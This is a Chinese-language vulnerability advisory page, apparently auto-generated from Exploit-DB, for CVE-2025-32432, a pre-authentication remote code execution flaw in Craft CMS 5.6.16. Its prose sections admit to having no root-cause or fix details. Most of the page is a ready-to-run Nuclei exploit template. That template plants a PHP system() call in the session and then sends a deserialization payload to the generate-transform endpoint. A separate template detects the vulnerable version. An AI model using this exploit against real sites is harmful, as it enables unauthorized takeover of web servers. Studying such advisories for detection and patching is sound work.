[webapps] Craft CMS 5.6.16 - RCE
CVE-2025-32432
Craft CMS 5.6.16 存在远程代码执行漏洞
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-32432 |
|---|---|
| 漏洞类型 | 远程代码执行 |
| 受影响版本 | Craft CMS 5.6.16 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-29 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
严格基于原文内容,未提供具体函数/参数/设计缺陷信息,无法确定根本原因。
🎯 攻击场景
严格基于原文内容,未提供攻击步骤,无法描述。
💥 漏洞影响
严格基于原文内容,标题明确为RCE,可导致远程代码执行。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-32432-exploit
info:
name: Craft CMS 5.6.16 - Pre-Auth RCE Exploit
author: your-username
severity: critical
description: Exploit Craft CMS CVE-2025-32432 via session poisoning and deserialization
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-32432
tags: cve,cve2025,craftcms,rce,exploit
variables:
target: "{{BaseURL}}"
cmd: "id"
http:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
Connection: close
cookie-reuse: true
matchers:
- type: word
words:
- "Craft CMS"
part: body
extractors:
- type: kval
name: PHPSESSID
internal: true
kval:
- "PHPSESSID"
- raw:
- |
GET /index.php?p=admin/dashboard&a={{{{php_system}}}} HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{PHPSESSID}}
Connection: close
cookie-reuse: true
attack: batteringram
payloads:
php_system:
- "<?php system('{{cmd}}'); ?>"
- raw:
- |
POST /actions/assets/generate-transform HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: PHPSESSID={{PHPSESSID}}
Connection: close
{
"assetId": 1,
"handle": {
"width": 1,
"height": 1,
"as hack": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "yii\\rbac\\PhpManager",
"__construct()": [
{
"itemFile": "/tmp/sess_{{PHPSESSID}}"
}
]
}
}
}
matchers:
- type: word
words:
- "uid="
- "gid="
- "www-data"
- "root:"
part: body🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-32432-detection
info:
name: Craft CMS 5.6.16 - Pre-Auth RCE Detection
author: your-username
severity: critical
description: Detect Craft CMS version vulnerable to CVE-2025-32432
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-32432
tags: cve,cve2025,craftcms,rce
variables:
target: "{{BaseURL}}"
http:
- method: GET
path:
- "{{BaseURL}}/index.php/"
matchers:
- type: word
words:
- "Craft CMS"
part: body
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- 'Craft CMS (\d+\.\d+\.\d+)'
part: body
- method: GET
path:
- "{{BaseURL}}/actions/assets/generate-transform"
matchers:
- type: status
status:
- 404
- 500
negative: false
matchers-condition: and🛡️ 修复建议
严格基于原文内容,未提供补丁版本或临时缓解措施。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:06 | 来源: Exploit-DB